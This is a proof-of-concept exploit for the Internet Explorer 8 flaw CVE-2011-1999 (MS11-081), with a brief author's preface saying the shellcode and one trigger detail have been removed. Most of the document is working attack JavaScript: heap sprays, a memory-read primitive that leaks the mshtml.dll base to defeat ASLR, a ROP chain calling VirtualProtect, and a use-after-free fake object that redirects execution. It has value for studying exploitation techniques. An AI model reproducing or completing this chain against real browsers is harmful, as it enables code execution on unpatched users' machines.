Microsoft Internet Explorer 8 Code Execution

`Below is the PoC code for CVE-2011-1999 (MS11-081) that accompanies my  
blog article  
"Reliable Windows 7 Exploitation: A Case Study"  
http://ifsec.blogspot.com/2012/02/reliable-windows-7-exploitation-case.html  
  
Some notes about the PoC code:  
- The exploit uses a single vulnerability to both bypass ASLR and  
execute the payload without requiring any non-ASLR module in memory.  
- One tiny detail required for triggering the vulnerability has been  
removed, so the exploit (as given below) should not work, even on  
vulnerable systems. No, I won't tell you what it is. Sorry kids, this  
is for educational purposes only.  
- All offsets in the code were correct for mshtml.dll at the time  
this exploit code was written. As some time has passed between then  
and the time the vulnerability was patched, they won't be correct for  
many vulnerable versions of this module. Writing the exploit that  
doesn't rely on any hardcoded offsets is left as an exercise for the  
reader (more difficult, but certainly possible with the combination of  
the techniques used in the PoC below).  
  
  
  
<html>  
<head>  
</head>  
  
<body>  
  
  
<script type="text/javascript">  
<!--  
  
//originally, windows 7 compatible calc.exe shellcode from SkyLined  
var scode = "removed";  
  
var newstack,newstackaddr;  
var fakeobj;  
  
var spray,spray2,selarray,readindex,readaddr,optarryaddr;  
var elms = new Array();  
  
var optarray;  
  
var mshtmlbase;  
  
//option object that is to be corrupted  
var corruptedoption;  
var corruptedoptionaddr;  
var corruptaddr;  
  
function strtoint(str) {  
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);  
}  
  
function inttostr(num) {  
return String.fromCharCode(num%65536,Math.floor(num/65536));  
}  
  
function crash() {  
var o = new Option();  
selarray[99].options.add(o,-0x20000000);  
}  
  
function readmem(addr) {  
if(addr < readaddr) alert("Error, can't read that address");  
return strtoint(spray[readindex].substr((addr-readaddr)/2,2));  
}  
  
function readmem2(addr,size) {  
if(addr < readaddr) alert("Error, can't read that address");  
return spray[readindex].substr((addr-readaddr)/2,size/2);  
}  
  
function overwrite(addr) {  
try {  
var index = (addr-optarryaddr)/4 - 0x40000000;  
selarray[99].options.add(optarray.pop(),index);  
} catch(err) {}   
}  
  
function getreadaddr() {  
readaddr = 0;  
var indexarray = new Array();  
var tmpaddr = 0;  
var i,index;  
  
index = readmem(tmpaddr);  
indexarray.push(index);  
  
while(1) {  
tmpaddr += 0x100000;  
index = readmem(tmpaddr);  
for(i=0;i<indexarray.length;i++) {  
if(indexarray[i]==index+1) {  
readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;  
return 1;  
} else if(indexarray[i]==index-1) {  
readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;  
return 1;   
}  
}  
indexarray.push(index);  
}  
}  
  
//leverages the vulnerability into memory disclosure  
function initread() {  
//overwrite something in a heap spray slide  
try {  
selarray[99].options.add(optarray.pop(),-100000000/4);  
} catch(err) {}  
  
//now find what and where exectly did we overwrite  
readindex = -1;  
var i;  
for(i=1;i<200;i++) {  
if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2))  
{  
readindex = i;  
break;  
}  
}  
  
if(readindex == -1) {  
alert("Error overwriring first spray");  
return 0;  
}  
  
var start=2,len=spray[readindex].length-2,mid;  
while(len>10) {  
mid = Math.round(len/2);  
mid = mid - mid%2;  
if(spray[readindex].substr(start,mid) !=  
spray[readindex-1].substr(start,mid)) {  
len = mid;  
} else {  
start = start+mid;  
len = len-mid;  
//if(spray[readindex].substr(start,mid) ==  
spray[readindex-1].substr(start,mid)) alert("error");  
}  
}  
  
for(i=start;i<(start+20);i=i+2) {  
if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {  
break;  
}  
}  
  
//overwrite the string length  
try {  
selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1);  
} catch(err) {}  
  
if(spray[readindex].length == spray[readindex-1].length) alert("error  
overwriting string length");  
  
//readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24;  
getreadaddr();  
  
optarryaddr = readaddr + 100000000 + i*2;  
  
return 1;   
}  
  
function trysploit() {  
//create some helper objects  
for(var i =0; i < 100; i++) {  
elms.push(document.createElement('div'));  
}  
  
//force the option cache to rebuild itself  
var tmp1 = selarray[99].options[70].text;  
  
//overwrite the CTreeNode pointer  
overwrite(corruptaddr);  
//read the address of the option object we overwrited with  
var optadr = readmem(corruptaddr);  
//delete the option object...  
selarray[99].options.remove(0);  
  
CollectGarbage();  
  
//...and allocate some strings in its place  
for(var i = 0; i < elms.length; i++) {  
elms[i].className = fakeobj;  
}  
  
//verify we overwrote the deleted option object successfully  
if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;  
  
alert("success, calc.exe should start once you close this message box");  
  
//now do something with the corrupted option object  
corruptedoption.parentNode.click();  
}  
  
function hs() {  
  
//first heap spray, nop slide + shellcode   
spray = new Array(200);  
var pattern = unescape("%u0C0C%u0C0C");  
while(pattern.length<(0x100000/2)) pattern+=pattern;  
pattern = pattern.substr(0,0x100000/2-0x100);  
for(var i=0;i<200;i++) {  
spray[i] = [inttostr(i)+pattern+scode].join("");  
}  
  
//fill small gaps, we wan everything _behind_ our heap spray so that  
we can read it  
var asmall = new Array(10000);  
pattern = "aaaa";  
while(pattern.length<500) pattern+=pattern;  
for(var i=0;i<10000;i++) {  
asmall[i]=[pattern+pattern].join("");  
}  
  
//create some select and option elements  
selarray = new Array(100);  
for(var i=0;i<100;i++) {  
selarray[i] = document.createElement("select");  
for(var j=0;j<100;j++) {  
var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo");  
selarray[i].options.add(o,0);  
}  
}  
  
//create some extra option elements  
optarray = new Array(10000);  
for(var i=0;i<10000;i++) {  
optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo");  
}  
  
//enable memory disclosure  
if(initread()==0) return;  
  
//force the option cache to rebuild itself  
var tmp1 = selarray[99].options[60].text;  
  
//get the address of some option element to be corrupted, also remove  
it from its select element, we don't want anything else messing with  
it  
corruptedoptionaddr = readmem(optarryaddr+60*4);  
corruptedoption = selarray[99].options[60];  
selarray[99].options.remove(60);  
  
//get the base address of mshtml.dll based on the vtable address  
inside the option object  
mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0;  
alert("base address of mshtml.dll : " + mshtmlbase.toString(16));  
  
//we'll overwrite the pointer to the CTreeNode object, compute its address  
corruptaddr = corruptedoptionaddr+0x14;  
  
//second heap-spray, this one will act as a stack (we'll exchange  
stack pointer with a pointer into this)  
spray2 = new Array(200);   
  
//some address that is likely to be inside the "stack"  
newstackaddr = optarryaddr+100000000;  
newstackaddr-=newstackaddr%0x1000;  
newstackaddr+=0x24;  
  
//assemble the "stack" so that it calls VirtualProtect on the firs  
shellcode and then jumps into it through return-oriented-programming  
newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F);  
while(newstack.length<(0x1000/2))  
newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA");  
newstack = newstack.substr(0,0x1000/2);  
while(newstack.length<(0x100000/2)) newstack+=newstack;  
newstack = newstack.substr(0,0x100000/2-0x100);  
for(var i=0;i<200;i++) {  
spray2[i] = [newstack].join("");  
}  
  
//constract a fake object which will replace a deleted option object  
(it has to be the same size)  
//fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");  
fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");  
  
//loop until we either achieve command execution or fail  
for(var i=0;i<100;i++) {  
trysploit();  
}  
  
alert("Exploit failed, try again");  
  
}  
  
  
hs();  
  
  
-->  
</script>  
  
  
</body>  
</html>  
`